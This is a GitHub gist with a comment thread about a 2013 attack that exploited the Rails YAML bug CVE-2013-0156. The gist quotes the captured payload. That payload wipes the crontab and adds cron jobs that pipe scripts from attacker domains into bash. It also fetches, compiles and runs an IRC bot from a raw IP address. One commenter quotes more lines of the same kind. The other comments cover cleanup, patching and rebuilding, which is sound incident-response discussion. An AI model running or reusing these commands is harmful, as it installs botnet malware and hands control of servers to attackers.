-
-
Save ismasan/5647955 to your computer and use it in GitHub Desktop.
crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k |
Hi here !
I've disconnected my server until finding solution .. and I believe I have it :
chmod 700 /usr/bin/wget
=> http://forums.cpanel.net/f185/wget-abuse-hack-340232.html
this is a recent thread .. so I will test it tonight..
more search about subject, it seems to be this exploit :
after doing the chmod on wget, I receive another log from my server :
/bin/sh: wget: Permission denied
/bin/sh: wget: Permission denied
/bin/sh: wget: Permission denied
not forget to vi /var/spool/cron/crontabs/www-data
and delete the line about wget
last informations,
I'm running Rails 3.2.3 with ruby 1.9.2p320 (2012-04-20 revision 35421) [i686-linux]
Are you running nginx < 1.4.1? http://mailman.nginx.org/pipermail/nginx-announce/2013/000112.html
This is an exploit of an old Rails bug (CVE-2013-0156).
Clean your systems and update to 3.2.12.
In the future, make sure you subscribe to the rubyonrails-security mailing list to keep up to date with patches.
https://groups.google.com/forum/?fromgroups#!forum/rubyonrails-security
I'm building an application with will integrate with GitHub to alert you when a vulnerability is found in any of the Gems that your application uses.
For this case, you would have received an alert when the Rails vulnerabilities were found, and would then have had time to update your application before an attacker got access.
Sign up to be informed when this is ready here: http://www.rubyaudit.com
please update your rails-installation:
The Gem::Requirements piece makes me think its the Rails YAML parameter vulnerability from a few months ago. Even if you've updated versions, you may still be vulnerable. You can check here to see if that's the bug: https://www.tinfoilsecurity.com/railscheck
If your server has been compromised, you must rebuild from scratch - updating versions isn't enough.
It looks like it's part of a botnet, as it's using IRC.
@bu2, my server was hit (but not successfully exploited) yesterday by one of the listed IPs; 95.138.186.181. Rollbar.io seems to have caught it and logged it 6 times. The exact error is Hash::DisallowedType: Disallowed type attribute: "yaml"
.
You can test for vulnerable versions in applications automatically with GemCanary which can be especially helpful if you have a large number of applications and lose track of some of them from time to time. I've found it presents the various alerts in a context that's relevant to you based on your Gemfile.lock
.
Wow. I think this needs some clarification. I was not who posted it to HN. This is a rather old Rails vulnerability that has since been patched and explained. It was all over the internet back in January. I updated my apps as soon as the patches were made available and none of my servers were ever successfully attacked in this way. I just spotted the backtraces in my error logs and posted the offending code here for reference.
All the comments and discussion are appreciated but I will suggest that if you were affected by this and plan to start a discussion then use your own fork and attribution. Thanks!
Hi,
an what about my configuration ??
Server version: Apache/2.2.14 (Ubuntu)
Rails 3.2.3
ruby 1.9.2p320 (2012-04-20 revision 35421) [i686-linux]
no nginx, no rails 3.2.1, no redmine, no yalm problem, but I had the same problem detailed below :
- k.c, k and ka files in /var/tmp (probably irc script)
- an new line in my crontab executing some wget like this :
wget -O /var/tmp/k.c 188.190.124.120/kaiten-src.c && gcc -o /var/tmp/ka /var/tmp/k.c && chmod +x /var/tmp/ka && /var/tmp/ka
wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O -
wget -O /var/tmp/k colkolduld.com/req/work.php && chmod +x /var/tmp/k && /var/tmp/k
I do not find any suspect trace in my apache log, but there were some actions under fail2ban ( I didn't look deep at it anymore since chmod and update www-data cron resolve my problem as describe above).
I'm still searching how the malicious scripts were upload to my server ...
Hi,
my server was infected too, should I do a reinstall? Or should removing the files and upgrading rails be enough?
my server was infected too, should I do a reinstall?
definetly
@Netmisa : I've since uninstalled PhpMyAdmin from my server, but I was using one installed by apt-get -- 3.4.5-1.
Ok, anyway we known now where the problem comes from.
Sounds like this one
http://www.h-online.com/open/news/item/Attack-wave-on-Ruby-on-Rails-1872588.html
It's one of the stable ones, sorry I can't check now.
Ruby version: 1.9.3-p327
Rails version: 3.2